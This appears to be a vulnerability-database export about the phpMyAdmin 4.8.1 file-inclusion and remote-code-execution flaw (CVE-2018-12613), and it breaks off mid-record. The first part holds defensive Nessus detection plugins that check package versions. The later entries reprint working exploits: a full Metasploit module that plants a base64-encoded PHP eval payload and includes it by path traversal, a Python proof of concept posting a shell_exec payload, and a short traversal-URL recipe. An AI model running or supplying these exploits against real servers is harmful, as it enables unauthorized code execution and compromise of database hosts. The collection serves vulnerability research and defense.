(17cb6ff3-7670-11e8-8854-6805ca0b3d42)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The phpMyAdmin development team reports : Summary XSS in Designer\nfeature Description A Cross-Site Scripting vulnerability was found in\nthe Designer feature, where an attacker can deliver a payload to a\nuser through a specially crafted database name. Severity We consider\nthis attack to be of moderate severity. Summary File inclusion and\nremote code execution attack Description A flaw has been discovered\nwhere an attacker can include (view and potentially execute) files on\nthe server.\n\nThe vulnerability comes from a portion of code where pages are\nredirected and loaded within phpMyAdmin, and an improper test for\nwhitelisted pages.\n\nAn attacker must be authenticated, except in these situations :\n\n- $cfg['AllowArbitraryServer'] = true: attacker can specify any host\nhe/she is already in control of, and execute arbitrary code on\nphpMyAdmin\n\n- $cfg['ServerDefault'] = 0: this bypasses the login and runs the\nvulnerable code without any authentication Severity We consider this\nto be severe. Mitigation factor Configuring PHP with a restrictive\n`open_basedir` can greatly restrict an attacker's ability to view\nfiles on the server. Vulnerable systems should not be run with the\nphpMyAdmin directives $cfg['AllowArbitraryServer'] = true or\n$cfg['ServerDefault'] = 0\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2018-3/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2018-4/\"\n );\n # https://vuxml.freebsd.org/freebsd/17cb6ff3-7670-11e8-8854-6805ca0b3d42.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d30c0ecb\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"phpMyAdmin 4.8.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpMyAdmin Authenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"phpmyadmin<4.8.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:09:19", "description": "This update for phpMyAdmin fixes multiple issues.\n\nSecurity issues fixed :\n\n - CVE-2018-12613: File inclusion and remote code execution attack (boo#1098751)\n\n - CVE-2018-12581: XSS in Designer feature (boo#1098752)\n\nThis update to version 4.8.2 also contains number of upstream bug fixes and improvements.", "cvss3": {}, "published": "2019-03-27T00:00:00", "type": "nessus", "title": "openSUSE Security Update : phpMyAdmin (openSUSE-2019-490)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-12581", "CVE-2018-12613"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:phpmyadmin", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2019-490.NASL", "href": "https://www.tenable.com/plugins/nessus/123202", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-490.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(123202);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-12581\", \"CVE-2018-12613\");\n\n script_name(english:\"openSUSE Security Update : phpMyAdmin (openSUSE-2019-490)\");\n script_summary(english:\"Check for the openSUSE-2019-490 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for phpMyAdmin fixes multiple issues.\n\nSecurity issues fixed :\n\n - CVE-2018-12613: File inclusion and remote code execution\n attack (boo#1098751)\n\n - CVE-2018-12581: XSS in Designer feature (boo#1098752)\n\nThis update to version 4.8.2 also contains number of upstream bug\nfixes and improvements.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1098751\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1098752\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"phpMyAdmin 4.8.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpMyAdmin Authenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"phpMyAdmin-4.8.2-lp150.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:10:30", "description": "The remote host is affected by the vulnerability described in GLSA-201904-16 (phpMyAdmin: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in phpMyAdmin. Please review the CVE identifiers referenced below for details.\n Impact :\n\n Please review the CVE identifiers referenced below for details.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2019-04-16T00:00:00", "type": "nessus", "title": "GLSA-201904-16 : phpMyAdmin: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-12613", "CVE-2018-19968", "CVE-2018-19969", "CVE-2018-19970"], "modified": "2020-01-23T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:phpmyadmin"], "id": "GENTOO_GLSA-201904-16.NASL", "href": "https://www.tenable.com/plugins/nessus/124072", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201904-16.\n#\n# The advisory text is Copyright (C) 2001-2020 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124072);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2020/01/23\");\n\n script_cve_id(\"CVE-2018-12613\", \"CVE-2018-19968\", \"CVE-2018-19969\", \"CVE-2018-19970\");\n script_xref(name:\"GLSA\", value:\"201904-16\");\n\n script_name(english:\"GLSA-201904-16 : phpMyAdmin: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201904-16\n(phpMyAdmin: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in phpMyAdmin. Please\n review the CVE identifiers referenced below for details.\n \nImpact :\n\n Please review the CVE identifiers referenced below for details.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201904-16\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All phpMyAdmin users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-db/phpmyadmin-4.8.4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-19969\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"phpMyAdmin 4.8.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpMyAdmin Authenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-db/phpmyadmin\", unaffected:make_list(\"ge 4.8.4\"), vulnerable:make_list(\"lt 4.8.4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-07-13T03:59:36", "description": "phpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion, which can be exploited post-authentication to execute PHP code by application. The module has been tested with phpMyAdmin v4.8.1.", "cvss3": {}, "published": "2018-07-13T00:00:00", "type": "zdt", "title": "phpMyAdmin Authenticated Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-12613"], "modified": "2018-07-13T00:00:00", "id": "1337DAY-ID-30714", "href": "https://0day.today/exploit/description/30714", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'phpMyAdmin Authenticated Remote Code Execution',\r\n 'Description' => %q{\r\n phpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion,\r\n which can be exploited post-authentication to execute PHP code by\r\n application. The module has been tested with phpMyAdmin v4.8.1.\r\n },\r\n 'Author' =>\r\n [\r\n 'ChaMd5', # Vulnerability discovery and PoC\r\n 'Henry Huang', # Vulnerability discovery and PoC\r\n 'Jacob Robles' # Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'BID', '104532' ],\r\n [ 'CVE', '2018-12613' ],\r\n [ 'CWE', '661' ],\r\n [ 'URL', 'https://www.phpmyadmin.net/security/PMASA-2018-4/' ],\r\n [ 'URL', 'https://www.secpulse.com/archives/72817.html' ],\r\n [ 'URL', 'https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/' ]\r\n ],\r\n 'Privileged' => false,\r\n 'Platform' => [ 'php' ],\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ],\r\n [ 'Windows', {} ],\r\n [ 'Linux', {} ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Jun 19 2018'))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"Base phpMyAdmin directory path\", '/phpmyadmin/']),\r\n OptString.new('USERNAME', [ true, \"Username to authenticate with\", 'root']),\r\n OptString.new('PASSWORD', [ false, \"Password to authenticate with\", ''])\r\n ])\r\n end\r\n\r\n def check\r\n begin\r\n res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path) })\r\n rescue\r\n vprint_error(\"#{peer} - Unable to connect to server\")\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n if res.nil? || res.code != 200\r\n vprint_error(\"#{peer} - Unable to query /js/messages.php\")\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n # v4.8.0 || 4.8.1 phpMyAdmin\r\n if res.body =~ /PMA_VERSION:\"(\\d+\\.\\d+\\.\\d+)\"/\r\n version = Gem::Version.new($1)\r\n vprint_status(\"#{peer} - phpMyAdmin version: #{version}\")\r\n\r\n if version == Gem::Version.new('4.8.0') || version == Gem::Version.new('4.8.1')\r\n return Exploit::CheckCode::Appears\r\n end\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n def query(uri, qstring, cookies, token)\r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(uri, 'import.php'),\r\n 'cookie' => cookies,\r\n 'vars_post' => Hash[{\r\n 'sql_query' => qstring,\r\n 'db' => '',\r\n 'table' => '',\r\n 'token' => token\r\n }.to_a.shuffle]\r\n })\r\n end\r\n\r\n def lfi(uri, data_path, cookies, token)\r\n send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'cookie' => cookies,\r\n 'encode_params' => false,\r\n 'vars_get' => {\r\n 'target' => \"db_sql.php%253f#{'/..'*16}#{data_path}\"\r\n }\r\n })\r\n end\r\n\r\n def exploit\r\n unless check == Exploit::CheckCode::Appears\r\n fail_with(Failure::NotVulnerable, 'Target is not vulnerable')\r\n end\r\n\r\n uri = target_uri.path\r\n vprint_status(\"#{peer} - Grabbing CSRF token...\")\r\n\r\n response = send_request_cgi({'uri' => uri})\r\n\r\n if response.nil?\r\n fail_with(Failure::NotFound, \"#{peer} - Failed to retrieve webpage grabbing CSRF token\")\r\n elsif response.body !~ /token\"\\s*value=\"(.*?)\"/\r\n fail_with(Failure::NotFound, \"#{peer} - Couldn't find token. Is URI set correctly?\")\r\n end\r\n token = Rex::Text.html_decode($1)\r\n\r\n if target.name =~ /Automatic/\r\n /\\((?<srv>Win.*)?\\)/ =~ response.headers['Server']\r\n mytarget = srv.nil? ? 'Linux' : 'Windows'\r\n else\r\n mytarget = target.name\r\n end\r\n\r\n vprint_status(\"#{peer} - Identified #{mytarget} target\")\r\n\r\n #Pull out the last two cookies\r\n cookies = response.get_cookies\r\n cookies = cookies.split[-2..-1].join(' ')\r\n\r\n vprint_status(\"#{peer} - Retrieved token #{token}\")\r\n vprint_status(\"#{peer} - Retrieved cookies #{cookies}\")\r\n vprint_status(\"#{peer} - Authenticating...\")\r\n\r\n login = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'cookie' => cookies,\r\n 'vars_post' => {\r\n 'token' => token,\r\n 'pma_username' => datastore['USERNAME'],\r\n 'pma_password' => datastore['PASSWORD']\r\n }\r\n })\r\n\r\n if login.nil? || login.code != 302\r\n fail_with(Failure::NotFound, \"#{peer} - Failed to retrieve webpage\")\r\n end\r\n\r\n #Ignore the first cookie\r\n cookies = login.get_cookies\r\n cookies = cookies.split[1..-1].join(' ')\r\n vprint_status(\"#{peer} - Retrieved cookies #{cookies}\")\r\n\r\n login_check = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'vars_get' => { 'token' => token },\r\n 'cookie' => cookies\r\n })\r\n\r\n if login_check.nil?\r\n fail_with(Failure::NotFound, \"#{peer} - Failed to retrieve webpage\")\r\n elsif login_check.body.include? 'Welcome to'\r\n fail_with(Failure::NoAccess, \"#{peer} - Authentication failed\")\r\n elsif login_check.body !~ /token\"\\s*value=\"(.*?)\"/\r\n fail_with(Failure::NotFound, \"#{peer} - Couldn't find token. Is URI set correctly?\")\r\n end\r\n token = Rex::Text.html_decode($1)\r\n\r\n vprint_status(\"#{peer} - Authentication successful\")\r\n\r\n #Generating strings/payload\r\n database = rand_text_alpha_lower(5)\r\n table = rand_text_alpha_lower(5)\r\n column = rand_text_alpha_lower(5)\r\n col_val = \"'<?php eval(base64_decode(\\\"#{Rex::Text.encode_base64(payload.encoded)}\\\")); ?>'\"\r\n\r\n\r\n #Preparing sql queries\r\n dbsql = \"CREATE DATABASE #{database};\"\r\n tablesql = \"CREATE TABLE #{database}.#{table}(#{column} varchar(4096) DEFAULT #{col_val});\"\r\n dropsql = \"DROP DATABASE #{database};\"\r\n dirsql = 'SHOW VARIABLES WHERE Variable_Name Like \"%datadir\";'\r\n\r\n #Create database\r\n res = query(uri, dbsql, cookies, token)\r\n if res.nil? || res.code != 200\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Failed to create database\")\r\n end\r\n\r\n #Create table and column\r\n res = query(uri, tablesql, cookies, token)\r\n if res.nil? || res.code != 200\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Failed to create table\")\r\n end\r\n\r\n #Find datadir\r\n res = query(uri, dirsql, cookies, token)\r\n if res.nil? || res.code != 200\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Failed to find data directory\")\r\n end\r\n\r\n unless res.body =~ /^<td data.*?>(.*)?</\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Failed to find data directory\")\r\n end\r\n\r\n #Creating include path\r\n if mytarget == 'Windows'\r\n #Table file location\r\n data_path = $1.gsub(/\\\\/, '/')\r\n data_path = data_path.sub(/^.*?\\//, '/')\r\n data_path << \"#{database}/#{table}.frm\"\r\n else\r\n #Session path location\r\n /phpMyAdmin=(?<session_name>.*?);/ =~ cookies\r\n data_path = \"/var/lib/php/sessions/sess_#{session_name}\"\r\n end\r\n\r\n res = lfi(uri, data_path, cookies, token)\r\n\r\n #Drop database\r\n res = query(uri, dropsql, cookies, token)\r\n if res.nil? || res.code != 200\r\n print_error(\"#{peer} - Failed to drop database #{database}. Might drop when your session closes.\")\r\n end\r\n end\r\nend\n\n# 0day.today [2018-07-13] #", "sourceHref": "https://0day.today/exploit/30714", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-12-18T08:07:26", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-11-27T00:00:00", "type": "zdt", "title": "phpMyAdmin 4.8.1 Authenticated Local File Inclusion Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-12613"], "modified": "2018-11-27T00:00:00", "id": "1337DAY-ID-31685", "href": "https://0day.today/exploit/description/31685", "sourceData": "# Exploit Title: phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion\r\n# Exploit Author: Lucian Ioan Nitescu\r\n# Contact: https://twitter.com/LucianNitescu\r\n# Webiste: https://nitesculucian.github.io\r\n# Vendor Homepage: https://www.phpmyadmin.net/\r\n# Software Link: https://www.phpmyadmin.net/files/4.8.1/\r\n# Version: 4.8.1\r\n# Tested on: Ubuntu 18.04\r\n# CVE: CVE-2018-12613\r\n\r\n# 1. Description: \r\n\r\n# An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the \"$cfg['AllowArbitraryServer'] = true\" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the \"$cfg['ServerDefault'] = 0\" case (which bypasses the login requirement and runs the vulnerable code without any authentication).\r\n\r\n# 2. Proof of Concept:\r\n\r\nimport requests\r\n\r\n# input the target\r\nVALID_PHPMYADMIN_URL = \"\"\r\n\r\n# input a valid session (After authentification)\r\nVALID_PHPMYADMIN_SESSION = \"\"\r\n\r\nburp0_url = VALID_PHPMYADMIN_URL + \"/import.php\"\r\nburp0_cookies = {\"phpMyAdmin\": VALID_PHPMYADMIN_SESSION, \"pma_lang\": \"en\", \"pmaUser-1\": \"%7B%22iv%22%3A%22N2lLHGoe2cuUN5uvAbz8ww%3D%3D%22%2C%22mac%22%3A%222b02670d8802823d99c3ccaf1f0ece9f2eb4c536%22%2C%22payload%22%3A%22mR69lSBATnU%2B%2Bs5jL0c3yw%3D%3D%22%7D\", \"pmaAuth-1\": \"%7B%22iv%22%3A%22xoIEoAgAvAxL%5C%2F%5C%2Fa3c0iX8Q%3D%3D%22%2C%22mac%22%3A%22243d87482efacdde27e3d2a6c6e85ae3b903af66%22%2C%22payload%22%3A%22yl27EG%5C%2FIUngUnyZIKNa8O45enMc8iZyHjFpLmiDkWSs%3D%22%7D\"}\r\nburp0_headers = {\"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\", \"X-Requested-With\": \"XMLHttpRequest\", \"Connection\": \"close\"}\r\nburp0_data={\"is_js_confirmed\": \"0\", \"token\": \"?[[email\u00a0protected]?OUd\", \"pos\": \"0\", \"goto\": \"server_sql.php\", \"message_to_show\": \"Your SQL query has been executed successfully.\", \"prev_sql_query\": '', \"sql_query\": \"select '<?php $output = shell_exec(\\\"ls -al; date; id;\\\");echo \\\"<pre>$output</pre>\\\";exit;?>'\", \"sql_delimiter\": \";\", \"show_query\": \"1\", \"fk_checks\": \"0\", \"fk_checks\": \"1\", \"SQL\": \"Go\", \"ajax_request\": \"true\", \"ajax_page_request\": \"true\", \"_nocache\": \"1543255823534938840\", \"token\": \"?[[email\u00a0protected]?OUd\"}\r\nrequests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)\r\n\r\nprint \"While autentificated:\"\r\n\r\nprint \"- Please check: \" + VALID_PHPMYADMIN_URL + \"/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_\" + VALID_PHPMYADMIN_SESSION\r\n\r\nprint \"- Please check: \" + VALID_PHPMYADMIN_URL + \"/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php5/sess_\" + VALID_PHPMYADMIN_SESSION\r\n\r\n# 3. Solution:\r\n\r\n# Upgrade to version 4.8.2 or above.\n\n# 0day.today [2018-12-18] #", "sourceHref": "https://0day.today/exploit/31685", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-06-23T01:45:53", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-06-22T00:00:00", "type": "zdt", "title": "phpMyAdmin 4.8.1 Code Execution / Local File Inclusion Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-12613"], "modified": "2018-06-22T00:00:00", "id": "1337DAY-ID-30622", "href": "https://0day.today/exploit/description/30622", "sourceData": "# Exploit Title: phpMyAdmin 4.8.1 - Local File Inclusion to Remote Code Execution\r\n# Exploit Author: VulnSpy\r\n# Vendor Homepage: http://www.phpmyadmin.net\r\n# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz\r\n# Version: 4.8.0, 4.8.1\r\n# Tested on: php7 mysql5\r\n# CVE : CVE-2018-12613\r\n \r\n1. Run SQL Query : select '<?php phpinfo();exit;?>'\r\n2. Include the session file :\r\nhttp://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k\n\n# 0day.today [2018-06-23] #", "sourceHref": "https://0day.today/exploit/30622", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-20T06:05:17", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", 